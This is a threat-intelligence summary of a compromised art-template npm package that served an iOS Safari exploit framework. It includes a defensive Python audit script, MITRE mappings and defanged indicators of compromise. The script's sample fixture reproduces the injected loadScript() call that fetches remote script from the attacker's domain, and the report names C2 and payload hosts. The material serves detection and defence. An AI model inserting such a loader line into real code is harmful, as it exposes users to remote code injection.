Coruna Respawned: Compromised art-template npm Package Leads to iOS Browser Exploit Kit

A compromised npm package, art-template, was used to inject a Coruna-like iOS exploit delivery framework through a watering-hole chain that redirected victims to utaq[.]cfww[.]shop and targeted Safari on iOS 11.0 through 17.2. The implant fingerprinted devices, beaconed victim IP and device version to l1ewsu3yjkqeroy[.]xyz, and used version-specific WebAssembly and architecture checks to route payloads such as cassowary and other Coruna-linked exploit chains. #art-template #Coruna #UNC6691 #utaqcfwwshop #l1ewsu3yjkqeroyxyz

Keypoints

  • The art-template npm package was compromised after maintenance was handed to an unknown actor.
  • Malicious versions 4.13.5 and 4.13.6 injected remote scripts into lib/template-web.js.
  • The delivery chain redirected victims from v3.jiathis[.]com to utaq[.]cfww[.]shop/gooll/gooll.html.
  • The payload targeted Safari/WebKit on iOS 11.0 through 17.2 and rejected other browsers and newer iOS versions.
  • The implant performed multiple anti-bot and anti-automation checks, including navigator.webdriver detection and MathML probing.
  • It beaconed public IP, device version, and a campaign code to l1ewsu3yjkqeroy[.]xyz every 10 seconds.
  • The framework used Coruna-style content-addressed module fetching and version-specific WebAssembly logic, with strong overlap to Coruna exploit kit chains and UNC6691 activity.
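The first two key points above are the ones a defender can check for directly: whether a project pulled in art-template 4.13.5 or 4.13.6, and whether the installed lib/template-web.js carries the plaintext loadScript() call toward v3.jiathis[.]com. The audit below is an added example, not code from the Socket write-up or from the art-template project; it reads the two npm lockfile layouts (the flat "packages" map of lockfileVersion 2/3 and the nested "dependencies" tree of lockfileVersion 1) and regex-matches loadScript() URLs. The sample lockfile and the stand-in template-web.js content are constructed for illustration; the real injected file is minified, but the page notes the injected call itself is plaintext, which is what the regex keys on.

```python
"""Audit a Node.js project for the compromised art-template releases.

Added example (not the Socket write-up's or art-template's own code): checks a
package-lock.json for art-template 4.13.5 / 4.13.6 and scans lib/template-web.js
for a plaintext loadScript() call whose host is the injection domain.
"""
import json
import re
from pathlib import Path
from urllib.parse import urlparse

PACKAGE = "art-template"
COMPROMISED_VERSIONS = {"4.13.5", "4.13.6"}
INJECTED_DOMAIN = "v3.jiathis.com"
# loadScript("...") or loadScript('...'), tolerating whitespace inside the call
LOADSCRIPT_RE = re.compile(r"loadScript\s*\(\s*['\"]([^'\"]+)['\"]")


def compromised_versions_in_lockfile(lock: dict) -> list[str]:
    """Return '<install path>@<version>' for every compromised art-template entry."""
    hits = []
    # lockfileVersion 2/3: flat "packages" map keyed by install path
    for path, meta in lock.get("packages", {}).items():
        if path.rsplit("node_modules/", 1)[-1] == PACKAGE and meta.get("version") in COMPROMISED_VERSIONS:
            hits.append(f"{path}@{meta['version']}")

    # lockfileVersion 1: nested "dependencies" tree, walked recursively
    def walk(deps: dict, prefix: str) -> None:
        for name, meta in deps.items():
            if name == PACKAGE and meta.get("version") in COMPROMISED_VERSIONS:
                hits.append(f"{prefix}{name}@{meta['version']}")
            walk(meta.get("dependencies", {}), f"{prefix}{name}>")

    walk(lock.get("dependencies", {}), "")
    return hits


def injected_script_urls(source: str) -> list[str]:
    """Return loadScript() URLs in a template-web.js whose host is the injection domain."""
    return [url for url in LOADSCRIPT_RE.findall(source)
            if urlparse(url).hostname == INJECTED_DOMAIN]


def audit_project(root: Path) -> dict:
    """Run both checks against a project directory; either file may be absent."""
    result = {"lockfile_hits": [], "injected_urls": []}
    lock_path = root / "package-lock.json"
    if lock_path.is_file():
        result["lockfile_hits"] = compromised_versions_in_lockfile(json.loads(lock_path.read_text()))
    web_js = root / "node_modules" / PACKAGE / "lib" / "template-web.js"
    if web_js.is_file():
        result["injected_urls"] = injected_script_urls(web_js.read_text(errors="replace"))
    return result


# Constructed sample lockfile (lockfileVersion 3) with a compromised release installed
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"art-template": "^4.13.2"}},
        "node_modules/art-template": {"version": "4.13.5"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
}

# Constructed stand-in for a tampered lib/template-web.js: minified runtime
# followed by the plaintext injected call
SAMPLE_TEMPLATE_WEB = (
    "/* minified template runtime (constructed placeholder) */\n"
    'loadScript("https://v3.jiathis.com/code/jia.js?uid=artemplate");\n'
)

if __name__ == "__main__":
    print(compromised_versions_in_lockfile(SAMPLE_LOCK))
    print(injected_script_urls(SAMPLE_TEMPLATE_WEB))
    print(audit_project(Path(".")))
```

Run it from a project root to check the real files; the lockfile check is the cheap, reliable signal, while the loadScript() scan catches the case where node_modules was tampered without the lockfile recording one of the two bad versions.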

MITRE Techniques

  • [T1195.001] Supply Chain Compromise – The attacker abused a trusted npm package by taking over maintenance and publishing malicious versions (‘someone previously acquired the project under the guise of taking over its maintenance’).
  • [T1059.007] JavaScript – The malicious payload was delivered and executed as injected JavaScript in browser-side template code (‘injecting a plaintext loadScript() call’).
  • [T1105] Ingress Tool Transfer – The implant fetched remote modules and payloads from attacker-controlled infrastructure (‘fetch the server-side payload via a content-addressed remote module loader’).
  • [T1027] Obfuscated Files or Information – The code used UTF-16 packing, XOR arrays, and encoded constants to hide strings and values (‘per-string XOR encoding’ and ‘UTF-16 integer packer’).
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – The implant rejected headless or automated environments using webdriver, WebRTC/WebGL, MathML, and storage checks (‘unconditional block against all Selenium, Playwright, and Puppeteer-controlled browsers’).
  • [T1518] Software Discovery – The payload fingerprinted browser and OS versions to decide which module to load (‘parses version string into integer score’ and ‘version-specific payload modules’).
  • [T1041] Exfiltration Over C2 Channel – The implant sent victim IP and device version to a command-and-control endpoint (‘POST beacon to C2’ every 10 seconds).
  • [T1132.001] Data Encoding: Standard Encoding – The script encoded data and identifiers before transmission and module lookup (‘loadScript’, base64 constructor, and XOR-decoded strings).
  • [T1056.003] Input Capture: Web Portal Capture – The injected browser script could hijack forms and steal cookies/localStorage (‘cookie/localStorage theft, form hijacking, redirects’).
  • [T1499.001] Endpoint Denial of Service: Application Exhaustion Flood – The repeated beaconing and reload loop increased execution persistence and repeated client-side activity (‘setInterval(() => location.reload(), 60_000_000)’).

Indicators of Compromise

  • [Domains] Supply-chain injection and payload hosting – v3.jiathis[.]com, utaq[.]cfww[.]shop
  • [C2 Domain] Beacon destination – l1ewsu3yjkqeroy[.]xyz, and other related .xyz campaign infrastructure
  • [URLs] Injected and landing URLs – hxxps://v3.jiathis[.]com/code/jia.js?uid=artemplate, hxxps://utaq[.]cfww[.]shop/gooll/gooll.html
  • [URLs] Beacon and IP-oracle requests – hxxps://l1ewsu3yjkqeroy[.]xyz/api/ip-sync/sync, hxxps://ipv4[.]icanhazip[.]com
  • [File names] Entry point and self-registered name – 49554fde7424c31c.js, 7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.min.js
  • [File hashes] Entry-point script hashes – SHA-256 f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c, MD5 6e79ae622b7ef30f31fdbcc2dc65339e, and other hashes
  • [Campaign codes] Beacon identifiers – CHMK6IG08F42496C22, 1DECX7UIQIB43
  • [Remote module hashes] Version-specific module identifiers – e3b6ba10484875fabaed84076774a54b87752b8a, c03c6f666a04dd77cfe56cda4da77a131cbb8f1c, and 6beef463953ff422511395b79735ec990bed65f4
  • [Derived module paths] Content-addressed fetch paths – 5ff38f5342bb3c931bc504d6fa3523d0c8865b93.js, 46ecd515ac9e99ef0603063db39303a0fd849632.js

Read more: https://socket.dev/blog/coruna-respawned-compromised-art-template-npm-package